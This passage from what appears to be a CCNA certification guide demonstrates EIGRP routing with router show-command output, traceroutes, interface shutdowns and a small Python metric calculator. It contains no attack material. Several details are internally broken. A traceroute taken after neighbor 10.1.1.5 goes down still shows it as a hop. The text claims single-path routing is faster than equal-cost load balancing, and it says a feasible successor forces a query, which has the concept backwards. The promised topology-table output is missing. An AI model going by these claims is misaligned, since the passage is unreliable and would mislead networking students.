D 10.1.1.24 [90/2172416] via 10.1.1.17, 02:28:50, Serial0/0/0
[90/2172416] via 10.1.1.14, 02:28:50, Serial0/0/1
D 192.168.1.0/24 [90/30720] via 10.1.1.21, 02:28:49, FastEthernet0/1
D 192.168.2.0/24 [90/2172416] via 10.1.1.17, 02:28:50, Serial0/0/0
C 192.168.3.0/24 is directly connected, FastEthernet0/0
D 192.168.4.0/24 [90/2172416] via 10.1.1.14, 02:28:50, Serial0/0/1

R4

R4#SH IP ROUTE
Gateway of last resort is not set
10.0.0.0/30 is subnetted, 6 subnets
C 10.1.1.4 is directly connected, Serial0/0/1
D 10.1.1.8 [90/2172416] via 10.1.1.25, 02:29:51, FastEthernet0/1
C 10.1.1.12 is directly connected, Serial0/0/0
D 10.1.1.16 [90/2172416] via 10.1.1.25, 02:29:51, FastEthernet0/1
D 10.1.1.20 [90/2172416] via 10.1.1.5, 02:29:52, Serial0/0/1
[90/2172416] via 10.1.1.13, 02:29:52, Serial0/0/0
C 10.1.1.24 is directly connected, FastEthernet0/1
D 192.168.1.0/24 [90/2172416] via 10.1.1.5, 02:29:52, Serial0/0/1
D 192.168.2.0/24 [90/30720] via 10.1.1.25, 02:29:51, FastEthernet0/1
D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 02:29:52, Serial0/0/0
C 192.168.4.0/24 is directly connected, FastEthernet0/0

It seems that EIGRP has found all our networks and applied the best metric to each destination. If you look closely at the routing tables, you will see that two networks, 10.1.1.20 and 10.1.1.24, have multiple paths to them. The path a packet takes is determined by the router that learned the routes. So, what does that mean? EIGRP has two successor routes, that is, two routes whose feasible distances are equal, so both go into the routing table. All routes, including the successor routes, remain in the topology table. I have highlighted the networks with multiple paths, which means traffic can go in either direction; EIGRP load balances across equal-cost paths by default.

We need to see exactly which path is taken to the 10.1.1.20 network. From the R4 viewpoint, it could go via 10.1.1.5 or 10.1.1.13, so let's use the tools we have at hand, such as traceroute:

R4#traceroute 10.1.1.20
Type escape sequence to abort.
Tracing the route to 10.1.1.20
1 10.1.1.5 7 msec 1 msec 6 msec

So, even though both paths have the identical metric of 2172416, the router chooses the first path, from top to bottom, to send the packet to the destination. If that path is shut down or disconnected, it will still have an alternate route to get to the destination.
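The metrics in these tables come from EIGRP's composite metric. With the default K-values shown earlier by sh ip protocols (K1=1, K3=1, the rest 0), it reduces to 256 × (10^7 / lowest-bandwidth-in-kbps + cumulative-delay-in-tens-of-microseconds). A quick sketch of the arithmetic, assuming the usual default interface values (1544 kbps and 20000 µs for serial, 100000 kbps and 100 µs for FastEthernet):

```python
def eigrp_metric(min_bw_kbps, delays_us):
    """EIGRP composite metric with default K-values (K1=K3=1, K2=K4=K5=0)."""
    bw = 10**7 // min_bw_kbps                  # inverse of the slowest link bandwidth (kbps)
    delay = sum(d // 10 for d in delays_us)    # cumulative delay, in tens of microseconds
    return 256 * (bw + delay)

# A serial T1 hop (1544 kbps, 20000 us default delay) plus a
# FastEthernet segment (100 us) reproduces the 2172416 seen above:
print(eigrp_metric(1544, [20000, 100]))        # -> 2172416
# Two FastEthernet segments (100000 kbps, 100 us each) give 30720:
print(eigrp_metric(100000, [100, 100]))        # -> 30720
```

This is why every path crossing a serial link in this lab shows 2172416, while the pure FastEthernet paths show 30720.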
In your lab, if you followed the configuration exactly as I did, you should get the same results. But this is where your curiosity should come in. Shut down the interface with the 10.1.1.5 address and see what happens. What will your routing table look like then? Will it have only one route to the destination, or will it have more than one? Remember that when a successor route goes down, EIGRP queries the topology table to find an alternate route; but in this situation, will it need to, since an alternate route already exists? Let's take a look:

R1(config)#int s0/0/0
R1(config-if)#shut

Now let's take a look at the routing table from the R4 perspective. The first thing that happens is the following:

R4#
%LINK-5-CHANGED: Interface Serial0/0/1, changed state to down
%LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0/0/1, changed state to down
%DUAL-5-NBRCHANGE: IP-EIGRP 100: Neighbor 10.1.1.5 (Serial0/0/1) is down: interface down

R4#sh ip route
Gateway of last resort is not set
10.0.0.0/30 is subnetted, 5 subnets
D 10.1.1.8 [90/2172416] via 10.1.1.25, 02:57:14, FastEthernet0/1
C 10.1.1.12 is directly connected, Serial0/0/0
D 10.1.1.16 [90/2172416] via 10.1.1.25, 02:57:14, FastEthernet0/1
D 10.1.1.20 [90/2172416] via 10.1.1.13, 02:57:15, Serial0/0/0
C 10.1.1.24 is directly connected, FastEthernet0/1
D 192.168.1.0/24 [90/2174976] via 10.1.1.13, 02:57:14, Serial0/0/0
D 192.168.2.0/24 [90/30720] via 10.1.1.25, 02:57:14, FastEthernet0/1
D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 02:57:15, Serial0/0/0
C 192.168.4.0/24 is directly connected, FastEthernet0/0

Only one route to 10.1.1.20 remains, via 10.1.1.13, which had the same metric as the path via 10.1.1.5. So, in this situation, there was no need to query the topology table, since an alternate route already existed in the routing table. But let's verify this with the traceroute command:

R4#traceroute 10.1.1.20
Type escape sequence to abort.
Tracing the route to 10.1.1.20
1 10.1.1.13 0 msec 5 msec 1 msec (alternate path)
1 10.1.1.5 7 msec 1 msec 6 msec (original path)

Since the router now has only one path to the 10.1.1.20 network, it gets there more quickly; when it had multiple paths, it took longer. Now, I know we are talking about milliseconds, but it is still a delay, nonetheless. So, what does this tell us? Redundancy is not always a good thing. This is a full-mesh topology, which is very costly, and we are running into delays. So, be careful in your design of the network. There is such a thing as too much redundancy, and you can easily create Layer 3 loops and delays.

We have looked at the routing table, but not the topology table, so I am going to turn on the s0/0/0 interface again, look at the routing table once more to make sure all is as it was, and then look at the topology table. Almost immediately after turning the s0/0/0 interface on R1 back on, I receive the following message:

R4#
%LINK-5-CHANGED: Interface Serial0/0/1, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0/0/1, changed state to up
%DUAL-5-NBRCHANGE: IP-EIGRP 100: Neighbor 10.1.1.5 (Serial0/0/1) is up: new adjacency

Let us peek at the routing table on R4:

R4#sh ip route
Gateway of last resort is not set
10.0.0.0/30 is subnetted, 6 subnets
C 10.1.1.4 is directly connected, Serial0/0/1
D 10.1.1.8 [90/2172416] via 10.1.1.25, 03:08:05, FastEthernet0/1
C 10.1.1.12 is directly connected, Serial0/0/0
D 10.1.1.16 [90/2172416] via 10.1.1.25, 03:08:05, FastEthernet0/1
D 10.1.1.20 [90/2172416] via 10.1.1.13, 03:08:05, Serial0/0/0
[90/2172416] via 10.1.1.5, 00:01:45, Serial0/0/1
C 10.1.1.24 is directly connected, FastEthernet0/1
D 192.168.1.0/24 [90/2172416] via 10.1.1.5, 00:01:45, Serial0/0/1
D 192.168.2.0/24 [90/30720] via 10.1.1.25, 03:08:05, FastEthernet0/1
D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 03:08:05, Serial0/0/0
C 192.168.4.0/24 is directly connected, FastEthernet0/0

Notice that the first path listed for the 10.1.1.20 network is now through 10.1.1.13, not 10.1.1.5, as before. Now let us look at the topology table:

Keep in mind that the topology table holds all possible routes to all destination networks. Only the ones with the lowest FD make it to the routing table and earn the title of successor route. If you look at the highlighted networks, they are the same as the ones in the routing table. They both have exactly the same metric, so they both earn the title of successor route. But let's analyze another network, the last one on the list: 192.168.3.0. It has multiple routes, but the metrics are not the same. The FD is 2172416, so 10.1.1.13 is the successor route, while 10.1.1.5 has a metric of 2174976, which makes it a feasible successor that remains in the topology table. So, what does that mean to us? Well, if the successor route were to go down, EIGRP would have to query the topology table to acquire the alternate path. What does the routing table show us about the 192.168.3.0 network, from the R4 perspective?

R4#sh ip route
D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 03:28:10, Serial0/0/0

There is only one route, the one with the lowest FD, so it is true that, in this case, if this route goes down, a query to the topology table must take place. So, you see, it all depends on how you set up your network topology; you may have a feasible successor, or you may not. You must analyze the network you are working with to make it an effective network. We have not even changed the bandwidth of any of the interfaces, or used the variance command to include other routes in our load balancing.

Thus, in this article, we covered how EIGRP works, its features, and configuring EIGRP for single and multiple autonomous systems. To learn more about designing and implementing subnetted IPv4 and IPv6 addressing schemes, and more, check out the book CCNA Routing and Switching 200-125 Certification Guide.